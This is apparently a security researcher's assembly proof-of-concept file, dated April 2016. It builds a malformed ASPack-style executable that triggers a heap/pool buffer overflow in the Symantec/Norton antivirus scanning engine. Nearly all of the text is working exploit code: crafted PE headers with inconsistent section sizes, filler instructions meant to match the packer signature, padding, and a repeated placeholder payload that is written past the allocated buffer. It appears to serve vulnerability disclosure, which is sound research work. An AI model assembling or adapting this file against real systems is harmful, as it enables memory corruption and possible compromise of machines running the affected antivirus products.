BITS 32

; Symantec/Norton Antivirus ASPack Remote Heap/Pool memory corruption Vulnerability.
;
; Tavis Ormandy <taviso@google.com>, April 2016
;
; When parsing executables packed by an early version of aspack, a buffer
; overflow can occur in the core Symantec Antivirus Engine used in most Symantec
; and Norton branded Antivirus products. The problem occurs when section data is
; truncated, that is, when SizeOfRawData is greater than SizeOfImage.
;

VirtualAddress      equ 0x10000-0x08    ; VirtualAddress of section data, offset where copy starts.
SizeOfImage         equ 0x12000-0x0C    ; Size you want to allocate.
SectionPadding      equ 0x2000          ; SizeOfImage-VirtualAddress (but ignoring overhead)

mzhdr:
    dw "ZM"                             ; e_magic, "MZ" also works.
    dw 0                                ; e_cblp
    dw 0                                ; e_cp
    dw 0                                ; e_crlc
    dw 0                                ; e_cparhdr
    dw 0                                ; e_minalloc
    dw 0                                ; e_maxalloc
    dw 0                                ; e_ss
    dw 0                                ; e_sp
    dw 0                                ; e_csum
    dw 0                                ; e_ip
    dw 0                                ; e_cs
    dw 0                                ; e_lsarlc
    dw 0                                ; e_ovno
    times  4 dw 0                       ; e_res
    dw 0                                ; e_oemid
    dw 0                                ; e_oeminfo
    times 10 dw 0                       ; e_res2
    dd pesig                            ; e_lfanew

pesig:
    dd "PE"

pehdr:
    dw 0                                ; Machine
    dw 2                                ; NumberOfSections
    dd 0                                ; TimeDateStamp
    dd 0                                ; PointerToSymbolTable
    dd 0                                ; NumberOfSymbols
    dw opthdrsize                       ; SizeOfOptionalHeader
    dw 0                                ; Characteristics

opthdr:
    dw 0                                ; Magic
    db 0                                ; MajorLinkerVersion
    db 0                                ; MinorLinkerVersion
    dd 0                                ; SizeOfCode
    dd 0                                ; SizeOfInitializedData
    dd 0                                ; SizeOfUninitializedData
    dd VirtualAddress                   ; AddressOfEntryPoint
    dd 0                                ; BaseOfCode
    dd 0                                ; BaseOfData
    dd 0                                ; ImageBase
    dd 0                                ; SectionAlignment
    dd 0                                ; FileAlignment
    dw 0                                ; MajorOperatingSystemVersion
    dw 0                                ; MinorOperatingSystemVersion
    dw 0                                ; MajorImageVersion
    dw 0                                ; MinorImageVersion
    dw 0                                ; MajorSubsystemVersion
    dw 0                                ; MinorSubsystemVersion
    dd 0                                ; Win32VersionValue
    dd SizeOfImage                      ; SizeOfImage
    dd 0                                ; SizeOfHeaders
    dd 0                                ; CheckSum
    dw 0                                ; Subsystem
    dw 0                                ; DllCharacteristics
    dd 0                                ; SizeOfStackReserve
    dd 0                                ; SizeOfStackCommit
    dd 0                                ; SizeOfHeapReserve
    dd 0                                ; SizeOfHeapCommit
    dd 0                                ; LoaderFlags
    dd 0                                ; NumberOfRvaAndSizes
    times 16 dd 0, 0                    ; DataDirectory

    opthdrsize equ $ - opthdr

    ; Section Headers
    db ".data", 0, 0, 0                 ; Name
    dd 0                                ; VirtualSize
    dd VirtualAddress                   ; VirtualAddress
    dd 0xffffffff                       ; SizeOfRawData
    dd __data                           ; PointerToRawData
    dd 0                                ; PointerToRelocations
    dd 0                                ; PointerToLinenumbers
    dw 0                                ; NumberOfRelocations
    dw 0                                ; NumberOfLinenumbers
    dd 0                                ; Characteristics

    db ".text", 0, 0, 0                 ; Name
    dd 0                                ; VirtualSize
    dd VirtualAddress                   ; VirtualAddress
    dd (__data - __text)                ; SizeOfRawData
    dd __text                           ; PointerToRawData
    dd 0                                ; PointerToRelocations
    dd 0                                ; PointerToLinenumbers
    dw 0                                ; NumberOfRelocations
    dw 0                                ; NumberOfLinenumbers
    dd 0                                ; Characteristics

    hdrsize equ $ - $$

    align   4096, db 0

    ; This (gibberish) code is required to trigger the aspack signature, the
    ; code is loosely based on this description from the OpenRCE packer
    ; database, but just enough to trigger the signature:
    ;
    ; http://www.openrce.org/reference_library/packer_database_view/17
    ;
    ; This code is quite fragile, small changes might cause the signature to
    ; miss.
__text:
    pusha
    times   9 dw 0
    pop     ebp
    mov     ebx, 0xffffffed
    add     ebx, ebp
    sub     ebx, 0x12000
    cmp     dword [ebp+0x422], byte 0
    mov     dword [ebp+0x422], ebx
    jnz     near endpacker
 endpacker:
    lea     eax, [ebp+0x422]
    push    eax
    call    dword [ebp+0x422]
    mov     [ebp+0x422], eax
    mov     edi, eax
    lea     ebx, [ebp]
    push    ebx
    push    eax
    call    dword [ebp+0x422]
    mov     dword [ebp+0x3A8], eax
    lea     ebx, [ebp+0]
    push    ebx
    push    edi
    call    dword [ebp+0x422]
    mov     dword [ebp+0x422], eax
    lea     eax, [ebp+0]
    jmp     eax

    align   4096, db 0

    ; The contents of this section will be memcpy() onto the heap buffer at
    ; offset VirtualAddress, so first pad up to the valid bounds of the buffer
__data:
    times SectionPadding-($ - __data) db 0x41

    ; Now the contents of this section will be written past the end of the
    ; allocated buffer, corrupting memory.
__payload:
    times 1024 db "TestingSymantecExploit"
